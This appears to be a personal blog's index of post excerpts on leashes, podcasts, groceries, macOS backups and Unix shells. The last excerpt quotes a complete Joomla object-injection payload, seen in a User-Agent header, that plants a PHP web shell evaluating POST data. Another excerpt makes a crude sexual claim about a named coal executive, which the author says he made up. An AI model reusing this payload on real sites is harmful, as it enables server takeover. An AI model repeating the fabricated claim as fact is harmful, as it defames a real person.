TL;DR: Flexi retractable leashes are superior to the Alcott or Wigzi brands. I’ve been using Flexi brand retractable leashes for two decades. But after a few years either the internal spring breaks or the tape or cord is frayed to the point it breaks. So with anywhere from two to four dogs in my house during that time I’ve had to buy quite a few leashes during those two decades.

When I started this blog I wrote a post describing a few of the podcasts I was listening to that I felt were worth recommending to others. It’s time to augment that list. There are three I recently started listening to that I think everyone should make time to do likewise: “The Breach” by Rewire News and Lindsay E. Beyerstein. “Stay Tuned with Preet” by WNYC Radio and Preet Bharara.

Recently I started shopping at Grocery Outlet. I love popping in and finding that they have acquired a batch of goat or other interesting cheese and are offering it for less than half the price at the other grocery stores in the area. So when I saw them selling Jimmy Dean “Pancakes & Sausage Bites” for $2.99, compared to the $9.98 it purportedly sells for at typical stores, I decided to buy a box.

MacOS Sierra (OS X 10.12) modified the behavior of Time Machine from doing hourly backups to using a heuristic that decides whether to do a backup based on recent activity. For most users that’s a better approach since it makes it less likely the user will notice the performance impact of backups and will increase how far back in time backups are available. However, if you’re a software developer the new behavior is problematic.

I received an email a few days ago telling me about an opportunity for me, as a customer, to obtain a discount on other services an ISP provided. Since I wasn’t a customer I told them shove it where the sun doesn’t shine. I was surprised to receive a response from someone in the organization telling me this: Please accept our sincere apologies for the Marketing communication you received. This was an inadvertent error.

I have been thinking about whether I want to contribute to the maintenance of the Korn shell (ksh93) since it was open sourced in 2013. While trying to understand the organization of the project and how to build it I noticed that the math builtin (e.g., $(( ... )) ) supports a lot of functions I was not aware of despite having used the Korn shell for more than two decades.

As I mentioned in my previous article I’m looking for a new shell since I’ve given up on the Fish project. For many years I used ksh88 then ksh93. After that I switched to zsh because it looked like ksh was a dead project. But two years ago the AT&T Software Technology (“AST”) toolkit was moved to Github and open sourced. In the past year an individual has committed some changes to the ksh source code.

Why aren’t there any good alternatives to bash or zsh? Specifically, a OS CLI shell that does not suffer from the problems inherent in being compliant with the POSIX.2 (aka POSIX 1003.2) standard? And also doesn’t suffer from the other problem that bash and zsh have due to all the configurable behaviors that make it effectively impossible to predict how those shells will behave? Two years ago I got fed up with zsh and wrote a blog post why.

Rumors I’ve heard suggest that Robert Murray, the owner of “Murray Energy Corporation”, likes to shove clumps of coal up his rectum for sexual pleasure. Obviously I just made that up and don’t really mean it. But I felt compelled to write this in support of first amendment rights after I learned that the aforementioned individual decided to sue comedian John Oliver and the “Last Week Tonight” show: https://www.youtube.com/watch?v=ZvUp5f2ThPc. Mr. Murray is the type of individual I would not piss on if they were on fire.

Looking at my web server logs this morning I noticed a new attack signature. The attacker performs a “GET /” with this “User-Agent” header: }__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:239:\"file_put_contents($_SERVER[\"DOCUMENT_ROOT\"].chr(47).\"shootme.php\",\"|=|\\x3C\".chr(63).\"php \\x24mujj=\\x24_POST['360'];if(\\x24mujj!=''){\\x24xsser=base64_decode(\\x24_POST['z0']);@eval(\\\"\\\\\\x24safedg=\\x24xsser;\\\");}\");JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}~\xd9 It’s obviously a code injection attack. Googling tells me this attack was first documented in December 2015 such as in this writeup. It’s an attempt to inject code via a Joomla CMS vulnerability. I don’t use Joomla so this doesn’t affect my site.